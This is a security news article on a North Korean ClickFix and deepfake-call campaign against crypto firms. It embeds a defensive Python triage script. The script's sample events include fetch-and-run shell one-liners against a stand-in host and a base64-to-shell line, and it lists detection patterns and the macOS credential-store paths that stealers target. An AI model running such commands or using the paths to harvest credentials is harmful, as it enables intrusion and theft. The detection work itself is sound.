Cyberwire Daily

News
North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms

By Team-CWD, February 11, 2026

A North Korean hacking campaign is targeting financial technology and cryptocurrency firms with attacks that combine social engineering, deepfake video and macOS malware.

The attacks have been detailed by Google Cloud’s Mandiant Threat Intelligence, which has attributed the campaign to UNC1069, a financially motivated threat group working out of North Korea. The end goal of the attacks is to steal cryptocurrency.

Researchers identified one campaign that began with the hijacked Telegram account of a cryptocurrency executive, an account that had been compromised earlier.

The attacker used this account to message others in the fintech sector and build trust and rapport, then sent a calendar invite for a meeting.

The meeting was made to look like a Zoom call but was in fact hosted on infrastructure the attacker controlled. According to Mandiant, one target said that after joining the call they were confronted with a deepfake of the cryptocurrency executive.

Researchers have not been able to verify this claim, but they noted that AI-assisted social engineering scams are a known issue.

Once the victim had joined the meeting, the attacker claimed the victim was having audio issues and offered a fix.

The "fix" was a ClickFix attack: a technique, usually framed around a fabricated technical problem, that tricks victims into copying a command and running it on their own machine. The command quietly gives the attackers access and the ability to run code, and because the victim runs it themselves in a terminal, no malicious attachment or installer has to get past mail filtering or the user's own download warnings.

With that access, the attackers dropped malicious files onto the device: Waveshaper and Hypercall, two backdoors that gave them further control.

They then installed information-stealer malware and a data miner, Deepbreath and CHROMEPUSH, to extend their control of and persistence on the machine.

This gave them the ability to steal credentials from the user's Keychain, browser data from Chrome, Brave and Edge, user data from two different versions of Telegram, and data from Apple Notes.

Ultimately, the attackers could obtain all the login credentials and passwords needed to access the victim's accounts, either to steal from them directly or to use those accounts for further social engineering.
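The two host-side stages above, the pasted ClickFix command and the later reads of Keychain, browser, Telegram and Notes data, are both visible in endpoint telemetry. The following Python is an added example written for this page, not code from Mandiant, the campaign, or any product: the process events are constructed; the ClickFix command patterns are generic indicators, since the article does not reproduce the actual command; the credential-store paths are standard macOS locations, with the Telegram App Store container path assumed; and the per-store allowlists of legitimate reader processes are assumptions to be tuned for a real fleet.

```python
"""Triage endpoint events for the two host-side stages described above:
a ClickFix one-liner pasted into a terminal, then a stealer reading
macOS credential stores.  Added example; events below are constructed."""
import re
from typing import Dict, List, Optional, Set

# Generic ClickFix indicators.  The article does not print the command the
# attackers used, so these patterns are assumptions based on common
# ClickFix lures: remote script piped into a shell, base64 blob decoded
# into a shell (macOS base64 takes -D as well as -d), command substitution
# around curl/wget, and stripping of the quarantine attribute.
CLICKFIX_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b"),
    re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b"),
    re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
]

# Stores named in the article, as path fragments, mapped to the processes
# expected to open them.  Allowlists are assumptions; tune per fleet.
# The Telegram App Store container path is an assumption as well.
CREDENTIAL_STORES: Dict[str, Set[str]] = {
    "Library/Keychains/login.keychain-db": {"securityd"},
    "Google/Chrome/Default/Login Data": {"Google Chrome"},
    "BraveSoftware/Brave-Browser/Default/Login Data": {"Brave Browser"},
    "Microsoft Edge/Default/Login Data": {"Microsoft Edge"},
    "Telegram Desktop/tdata": {"Telegram"},
    "Group Containers/6N38VWS5BX.ru.keepcoder.Telegram": {"Telegram"},
    "group.com.apple.notes/NoteStore.sqlite": {"Notes"},
}


def is_clickfix_cmdline(cmdline: str) -> bool:
    """True if a command line matches any ClickFix indicator."""
    return any(p.search(cmdline) for p in CLICKFIX_PATTERNS)


def credential_store_for(path: str) -> Optional[str]:
    """Return the matching store key for a file path, or None."""
    for fragment in CREDENTIAL_STORES:
        if fragment in path:
            return fragment
    return None


def triage(events: List[dict]) -> List[dict]:
    """Walk exec/open events and return findings in event order.

    An exec event fires when its command line looks like ClickFix; an open
    event fires when a credential store is read by a process outside its
    allowlist.  The parent process is carried through so an analyst can
    see that the shell was spawned from Terminal, i.e. typed by the user.
    """
    findings = []
    for ev in events:
        if ev["type"] == "exec" and is_clickfix_cmdline(ev["cmdline"]):
            findings.append({"rule": "clickfix_cmdline",
                             "process": ev["process"],
                             "parent": ev.get("parent"),
                             "detail": ev["cmdline"]})
        elif ev["type"] == "open":
            store = credential_store_for(ev["path"])
            if store and ev["process"] not in CREDENTIAL_STORES[store]:
                findings.append({"rule": "credential_store_read",
                                 "process": ev["process"],
                                 "detail": ev["path"]})
    return findings


# Constructed sample telemetry: a victim pastes a supposed audio fix, then
# a hidden binary (name invented) sweeps browser and Keychain data.
SAMPLE_EVENTS = [
    {"type": "exec", "process": "bash", "parent": "Terminal",
     "cmdline": 'bash -c "$(curl -fsSL http://meeting-fix.example/audio.sh)"'},
    {"type": "exec", "process": "bash", "parent": "Terminal",
     "cmdline": "echo aGVsbG8K | base64 -D | sh"},
    {"type": "exec", "process": "zsh", "parent": "Terminal",
     "cmdline": "curl -O https://updates.example/Client.pkg"},  # benign download
    {"type": "open", "process": "Google Chrome",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"type": "open", "process": ".audio_fix",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"type": "open", "process": ".audio_fix",
     "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "open", "process": "Notes",
     "path": "/Users/alice/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['process']}: {f['detail']}")
```

Run against the constructed events it reports the two pasted one-liners and the two credential-store reads by the unknown binary, while the plain package download and the browsers' own reads of their databases stay quiet. The Terminal parent on the exec findings is the detail that distinguishes a user-typed ClickFix command from a script run by a legitimate installer, and the allowlist approach deliberately errs toward noise: a Keychain read by anything other than securityd is worth a look even when it turns out to be a backup tool.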

“The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data and session tokens to facilitate financial theft,” said Mandiant.

“This incident was a targeted attack to harvest as much data as possible for a dual purpose: enabling cryptocurrency theft and fuelling future social engineering campaigns by leveraging victim’s identity and data,” the company added.

State-backed North Korean threat groups have a history of significant cryptocurrency heists and attacks which target organizations in financial technology.

In 2025 alone, North Korea made over $2bn from attacks on cryptocurrency targets, accounting for over 60% of all cryptocurrency stolen last year.